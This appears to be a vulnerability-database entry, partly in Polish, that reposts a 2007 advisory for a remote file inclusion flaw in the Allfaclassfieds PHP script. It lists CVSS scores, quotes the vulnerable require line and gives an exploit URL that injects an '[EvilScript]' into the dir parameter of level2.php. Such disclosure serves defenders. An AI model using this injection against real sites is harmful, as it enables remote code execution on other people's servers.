Allfaclassfieds (level2.php dir) remote file inclusion

2007-04-26 / 2007-04-27

Credit: Dr.RoVeR

Risk: High

Local: No

Remote: Yes

CVE: CVE-2007-2254

CWE: CWE-Other

Ogólna skala CVSS: 7.5/10

Znaczenie: 6.4/10

Łatwość wykorzystania: 10/10

Wymagany dostęp: Zdalny

Złożoność ataku: Niska

Autoryzacja: Nie wymagana

Wpływ na poufność: Częściowy

Wpływ na integralność: Częściowy

Wpływ na dostępność: Częściowy

Allfaclassfieds  (level2.php dir) remote file inclusion

--
 Bug Found By Dr.RoVeR -->Arab48 Hacker

Contact: Dr.RoVeR (at) HackerMail (dot) CoM [email concealed]
 ---

Script: allfaclassfieds

Download: http://scriptat.com/download.php?sid=718
 --

Bug File: level2.php

Bug code in line 4:
 require("$dir/admin/dp.php");

--

Exploit:
 http://site.com/[path]/admin/setup/level2.php?dir=[EvilScript]

-- 
_______________________________________________
Get your free email from http://www.hackermail.com

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Allfaclassfieds (level2.php dir) remote file inclusion

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.